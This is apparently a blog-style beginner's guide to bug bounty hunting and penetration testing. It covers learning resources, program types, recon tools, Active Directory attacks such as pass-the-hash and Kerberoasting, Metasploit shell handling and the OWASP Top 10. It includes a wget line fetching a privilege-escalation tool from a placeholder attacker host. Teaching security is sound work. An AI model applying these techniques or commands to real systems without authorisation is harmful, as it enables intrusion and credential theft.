Hello All Hackers !! Here is a guide to get started with Bug Bounty

Photo by Pawel Czerwinski on Unsplash

A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to exploits and vulnerabilities. These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse.

Some are completely new to the idea of web development with little prior programming experience, some are experienced web developers with no experience in cybersecurity while some are highly skilled cybersecurity professionals. The steps that should be taken are the same for everyone, one can, however, skip one or more steps based on his/her skills and experience.

Let’s get started with these steps:

1. Learn Computer Networking:

A decent knowledge of Computer Networks is very much necessary for getting started with the bug bounty. Though you’re not required to have expertise in the computer networking domain to get started with bug bounty — but you should be proficient at least with the fundamentals of inter-networking, IP addresses, MAC addresses, OSI stack (and TCP/IP stack), etc. You can learn it from some of the quality online resources like GeeksforGeeks Computer Networks.

2. Get Familiarized With the Web Technologies: This includes getting a basic understanding of web programming and web protocols. Web programming languages are JavaScript, HTML, and CSS. A beginner to intermediate level proficiency with these languages is more than enough in the beginning. The protocols you should learn about are HTTP, FTP, TLS, etc. These can be learned from the corresponding RFCs or from numerous offline or online resources available over the web.

3. Learning Web Application Security Measures and Hacking Techniques: This will include learning about common security mechanisms, security practices, their bypasses, common vulnerabilities in web applications, ways to find these vulnerabilities, and ways to patch and prevent the applications from these vulnerabilities. Useful resources are:

Recommended Books:
Web Application Hacker’s Handbook
Mastering Modern Web Application Penetration Testing
Web Hacking 101

4. Practicing and Polishing Your Skills: Practicing helps in developing a framework for approaching a target. The more you practice on diverse targets of different difficulty levels the easier it will be for you to approach a web application in a way that increases your chances of finding a critical vulnerability (or even finding a vulnerability if the application is well secured and has been already tested by many hunters). Try making great use of these resources:

Vulnerable Web Applications: These are intentionally vulnerable virtual machines or web app packages. Vulnerable web applications are available as general variants that contain many types of vulnerabilities and as dedicated variants that focus on a single vulnerability and its subtleties. Some examples are:
BWapp
DVWA
OWASP Webgoat
Cyclone Transfers
Bricks
Butterfly Security Project
Hacme
Juice Shop
Rails Goat
SQLol
BWapp, DVWA(Damn Vulnerable Web Application), and Webgoat are the best for beginners.

5. Testing Real Targets: After you are thorough with your basics and have a decent level of skill, you can start doing the actual hunting on real websites. A lot of websites run bug bounty programs for their web assets. Some big names are:

Facebook
Twitter
Google
Verizon
Starbucks
Shopify
Spotify
Apple

These companies reward generously but finding a security bug on any of their assets is highly difficult due to tough competition. You must remember that the top bug bounty hunters of the world are testing these websites along with you. However, that doesn’t mean you can’t find something at all.

6. Staying Current on Latest Vulnerabilities: For this, you can follow elite researchers and learn from their work. You can also read disclosed reports on bug bounty platforms like HackerOne. Some recommended researchers to follow are:

Frans Rosén
Jason Haddix
Geekboy
PortSwigger
Jobert Abma

You need to know that if you really want to get started with bug bounty then it doesn’t matter what is your academic background or what is your current working domain — you simply can start learning the required skills and tools and start doing the actual hunting!!

Different types of programs

Vulnerability Disclosure Program (VDP)

Typically these programs are public and only reward you with points and nothing more, however some VDP’s are also private. Most people starting in bug bounties are told to start with VDP’s to ‘learn the ropes’ and to build ‘rep’ (reputation) to receive privates invites which pay, but what most researchers don’t realise is some of these VDP programs actually have paying programs as well, they are just private and invite only.
With that said, not all companies are able to run more than a VDP for a variety of reasons such as being a charity. Just because a company is using a VDP doesn’t mean you should ignore them, it means just be mindful about who you are working with and their reasons for running a VDP, then decide if you should spend on their program. Practising on VDP’s can be a great way to get first-hand experience for what it’s like to participate in bug bounties and hack blindly on real world websites. It is also not unheard of to be invited to a company’s paying program after “impressing” them in their VDP, however this depends on your risk vs. reward ratio. You’re the shot caller.

Public Bug Bounty Program

A public bug bounty program such as Google & Facebook that is open to the world and reward money. There are LOTS of public bug bounty programs out there and some even have wide scopes. You can discover public programs from Disclose.IO, however also make sure to search on Google to discover more companies which welcome hackers. You can find google dorks below to help find programs.
Most people are under the illusion that just because a program is public that there will be nothing to find. False! New code and new features are pushed daily, especially if it’s a large company spanning across the world!
You also have to consider that if most researchers are avoiding these programs because they think too many eyes are on there, surely there isn’t as many eyes as they actually think? Get creative, there are bugs out there.

Private Bug Bounty Program

Typically most private invites you receive will be paying programs, however not all private programs do pay. You can usually customise your invite preference on bug bounty platforms if you want to filter paying private vs. non-paying. Researchers are usually invited to private programs after showing some activity on the platform such as a certain amount of valid bugs, certain rep/signal/impact value and activity in x amount of days.
You may hear some researchers refer to “VIP” and “secret” programs and these are programs setup by certain companies to work only with hackers they select. There is not usually a public criteria to join one of these and you are mostly selected based on your activity on their other program(s) & your skill.

Notice Board: Google has lots of information indexed that can help you find external programs as well as information relating to your specified company. There are lots of queries you could search for, however here are some popular search queries: (don’t forget to try different languages!).

inurl:responsible disclosure

"report security vulnerability"

"vulnerability disclosure"

"responsible vulnerability disclosure"

diclose vulnerability "company"

"powered by hackerone" "submit vulnerability report"

indesc:bug bounty|vulnerability disclosure

inurl: bug bounty

"vulnerability reward"

white hat program

"vulnerability reporting policy"

inurl:responsible-disclosure-policy

Methodology

Start with Methodology because I think building your Methodology is one of the most important things. It helps to stay organized and going through a certain set of steps helps me. On every CTF that you practice on, you will refine your Methodology .

If you want to learn about Methodology, check out Jason Haddix’s video. There are tons of material out there regarding the Hacking methodology.

The importance of Notes

Taking good notes is very important.

Taking good notes as Hacker / Pentester / Bug Hunter is crucial. You will work with your Notes open at all times.

Own your notes, keep them organized, refine them and learn to love them.

Reconnaissance

Learn a ton about doing good reconnaissance. The more stuff you gather the easier it is for you to get access. If you slack in recon, you’ll struggle at executing later.

Passive Reconnaissance Tools

Target Validation

WHOIS Lookup
nslookup
dnsrecon

Subdomain Enumeration

Google
Dig
Nmap
Sublist3r
Bluto
crt.sh
Amass

Fingerprinting

Nmap
Wappalyzer
WhatWeb
BuiltWith
Netcat

Data Breaches

HaveIBeenPwned
Hunter.io
Breach-Parse

That’s a lot of stuff to wrap your head around. You pick what works for you and integrate it into your Methodology.

Active Directory

Let me summarize:

General AD Stuff

The AD DS Data Store
Ntds.dit file (Hashes passwords)

SAM Hashes

Local User hashes

Kerberos

How Kerberos works

Top Five Ways to get Domain Admin before Lunch

Very worth-while read

Domain Enumeration

PowerView

Gaining Domain Access

LLMNR Poisoning
SMB Relay Attacks
BloodHound

Downloads Domain Data & Visualizes it. Very useful.

Pass the Hash Attacks

NTLM vs NTLMv2
NTLM hashes can be passed, NTLMv2 hashes not!

Crackmapexec

Only works if credentials are available. Tool passes the password to other services/machines.
Using psexec.py to connect with the gathered hash

Secretdumps.py

Used to dump hashes

Mitigation of Pass The Hash attacks

Limit Account Re-Use
Strong Passwords
Privilege Access Management

Token Impersonation

What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. “Cookies for computers”

Token Impersonation Attack

Requires a Username + Password of any machine

Kerberoasting

Using Impacket
Needs User Account with Credentials to work. It doesn’t need to be an Admin account.

GPP / cPassword Attacks

Always worth checking for, especially on older Servers.
Metasploit Module -> auxiliary/smb_enum_gpp

Mimikatz

Tool used to Dump Hashes of all kind
SAM Hashes
Golden Ticket Attacks

Active Directory is a huge topic on its own. You have to go through a course to fully understand all of it.

Shells

I don’t know how else to call this, but I feel like this deserves its own section. Running manual exploits usually leaves you with dumb shells, which you generally want to elevate to beautiful shells. I learned a lot about this and it is extremely helpful to have a fully interactive shell compared to a dumb one.

This is an excellent Article about Upgrading Simple Shells to Fully Interactive ones by Ropnop. Read it.

Metasploit

Elevate Dumb Shell to Meterpreter Shells

After a dumb shell was created with a Metasploit Exploit hit CTRL + Z to move the shell to the background
Type: sessions and note the session ID
Type: sessions -u 1 -> This spawns a meterpreter shell if available
Type: sessions -i 2 -> To use the newly spawned meterpreter shell

Reverse Shell vs Bind Shell

Reverse Shell
Target connects to attacker
Bind Shell
Attacker connects to target

If Username + Password are available

Create Meterpreter Shell from scratch with exploit/windows/smb/psexec

Impacket

Can also be used to create Shells

smbexec
wmiexec
psxec

Transferring Files

When exploiting servers, you will most likely find yourself in a situation where you want to either upload a tool or an exploit to a server or, download files from the server to your attacking machine. I learned a couple of techniques that help you with that.

SimpleHTTPServer
Pre-installed on Kali
Starts an HTTP Server on Port 8000 in the current directory which can be accessed from other hosts on the network to transfer files.
You can use: wget http://ipofattacker:8000/unix-privesc-check.tar to download files
Certutil
Pyftpdlib
SSH

I like this method a lot if you have an SSH user to the target

scp /path/to/file username@IP:/path/to/destination
use pwd on target to see the correct directory

Web

Now to the fun part. You can put your focus on Web because you want to get started with Bug Bounties. Burp should be a part on its own because it is so widely used in Web Application testing, but I’ll try to summarize as best as I can. I upgraded to Burp Pro since my trial has expired. You can use the free community edition with limited functionality, which is perfectly fine for the beginning.

The OWASP Top Ten

The OWASP TOP 10 is a list of the Top 10 Web Application Security Risks. The OWASP Top 10 are going to be a part of every interview you are going to participate it. I actually just went through one, they asked a ton of OWASP questions. I knew I needed to at least understand the OWASP Top Ten on a high level, so once again, the Cyber Mentor’s course helped me ton to understand them, as he goes over every one of them.

1 — SQL Injection

Testing for SQL injection using Burp Intruder
Logging in as the admin without authentication using SQL Injection (So much fun)
Learning about SQL Injection Payloads and how to use Intruder to test for them
Learned how to prevent SQL Injection

2 — Broken Authentication

Enumerate users or emails through improperly configured login forms
Abuse forgot password forms for user enumeration

3 — Sensitive Data Exposure

Looking through all kinds of folders on a website in Burp
Searching for Keys
Checking Security Headers
Testing SSL with Nmap’s ssl-enum-ciphers script

4 — XXE (XML External Entities)

XXE Payloads
Trying XML payload uploads and checking burp what is returned
How to prevent XXE

5 — Broken Access Control

Checking HTML code for hidden forms or fields, etc.
Unauthenticated access to restricted areas

6 — Security Misconfiguration

One of the most common issues
Result of insecure configurations
Outdated libraries or services

7 — XSS (Cross-Site Scripting)

I ❤ XSS
XSS Payloads
How to test for XSS using Burp
Different Types of XSS (Stored, Reflected, DOM)
How to prevent XSS

8 — Insecure Deserialization

Rather uncommon and hard to exploit
Leads to RCE

9 — Using Components with Known Vulnerabilities

Learned how to scan for those using Burp extensions
Struts 2

10 — Insufficient Logging & Monitoring

Can be exploited to maintain system access or pivot through the system
Brute Force undetected
Failing to detect breaches

Knowing the OWASP Top 10 is essential for doing Bug Bounties. Period. You have to have those down and then take your study further from there.

Other Web Stuff

Burp Suite
Most popular tool for Bug Bounties (literally everyone uses Burp)
General Stuff
Learned all the basic functionality
Learned what all the different tabs are doing
Learned how to read traffic
Learned about scopes
Learned how to recognize successful fuzzing attempts

Intruder

Burp Intruder can be used to attack all kinds of forms
You can run brute-force attacks using Burp Intruder
You can test for XSS, SQL Injection and Fuzz all the things with Intruder
Credential Stuffing

Repeater

Repeater allows you to modify requests and send them to the server

Extender

Lots of Burp Addons are available to install

Decoder

Allows you to decode stuff (base64 for example) right in Burp

I feel like this is just a small part of what Burp is, but it would get out of hand to put everything in here now. I will add to it in the following Blog posts in greater detail.

Directory Brute-Force

Using Gobuster or Dirbuster
Very important to find hidden files, dev sites, or generally get an overview of a websites folder hierarchy

Subdomain Enumeration

As previously mentioned in Passive Reconnaissance — Very important in Bug Bounties to find hidden subdomains, dev subdomains etc.
Owasp Amass
Sublist3r
crth.sh
Assetfinder
Httprobe
Gowitness

Enumerating Web Tech

How websites are built
Wappalyzer Firefox Addon
WhatWeb (Kali Tool)

Now there is a lot more I could go over, but I feel like it makes more sense going a bit more in-depth into those topics in future blog posts.

One last thing I want to mention tho is what I have learned from Hackthebox within this time.

Stuff you can learn from Hackthebox

Use Hackthebox almost exclusively for practice resource next to actual Bug Bounties.

Because this post is already becoming a behemoth and potentially the longest article I have written on here, I will keep the last month’s “what I’ve learned from Hackthebox” in an easily digestible bullet point format.

Privilege Escalation

Redis

Learn what Redis is and how to exploit it

SSH keys

Learned a ton about SSH keys and how to exploit them
Also learned how to crack them if a weak password is used

Exploits

Learned how to use manual exploits
Learned how to read exploits
Learned that I need to decode some exploits so they work on Linux with dos2unix
Example on Kali: dos2unix 47681.sh

Bash

Learn how Bash exploits use ${} placeholder values

Enumerate

Enumerate all the things.
If you are stuck
Enumerate some more
Look through all folders on a Server
Check .ssh folders
Check /opt/ folders
Check /home/ folders
Check folders and config files of installed services

Did I mention to enumerate some more?

Password Cracking

Cracking all kinds of passwords using tools like
Hashcat
JohnTheRipper
Hydra
Burp Suite

Brute Forcing stuff on CTF’s

…Is mostly pointless

Searchsploit

Learned how Searchsploit works and how useful it is

Searching for Exploits

Google all the Server/Service versions you find through enumeration and look for exploits
The key to easy CTF’s

SMB

Learned a ton about SMB
nmblookup
smbclient
nmap
rpcclient
enum4linux
smbmap

Great read on SMB and a great workflow

Ethical Hacking Courses

My favorite Ethical Hacking Courses are the ones created by StationX, who is more widely known as The Cyber Mentor. No course that I have taken online has advanced my skills more than his excellent Ethical Hacking Course, hands down.

Some other great courses are:

3. THE COMPLETE PYTHON FOR HACKING AND CYBER SECURITY BUNDLE

4. THE COMPLETE LINUX SKILLS BUNDLE

There is also an option to get access to all courses $149 per year. I can’t recommend StationX enough.

Does this ever end?

Even though I already spent five hours writing this blog post, I feel like we are just scratching the surface. I probably have forgotten to mention several things I’ve learned, but I felt like I needed to initiate this whole series with as much detail as I could.

The next posts will be much more in-depth and we will be going more technical on all the different things.

I hope that this series will find someone’s interest, and in the best, motivate some of you to get started as well. I’m not gonna lie, it is hard. It is hard, but with this blog, I want to show you that it’s possible if you put in the work. I do not come from a background of higher education, I learned everything I know by myself and with the help of the incredible Hacking community. Now is the time to give back, and I hope I can achieve this through this blog.

Notice : Some links might be affiliate . If you purchase anything by clicking , i might receive a commission .

Reference :

[How to Get Started With Bug Bounty? - GeeksforGeeks
Bug Bounty programs are a great way for companies to add a layer of protection to their online assets. A bug bounty…geeksforgeeks.org](https://www.geeksforgeeks.org/how-to-get-started-with-bug-bounty/ "geeksforgeeks.org/how-to-get-started-with-b..")

[Learn how to get started in bug bounties | BugBountyHunter.com
Vulnerability Disclosure Program (VDP) Typically these programs are public and only reward you with points and nothing…bugbountyhunter.com](https://www.bugbountyhunter.com/getting-started/ "bugbountyhunter.com/getting-started")

[How to get started with Bug Bounties
In this article, you will learn how to get started with Bug Bounties, or, how I got started with Bug Bounties. I will…ceos3c.com](https://www.ceos3c.com/security/get-started-with-bug-bounties/ "ceos3c.com/security/get-started-with-bug-bo..")

Want to say Hi to me ? Here is my linkedin .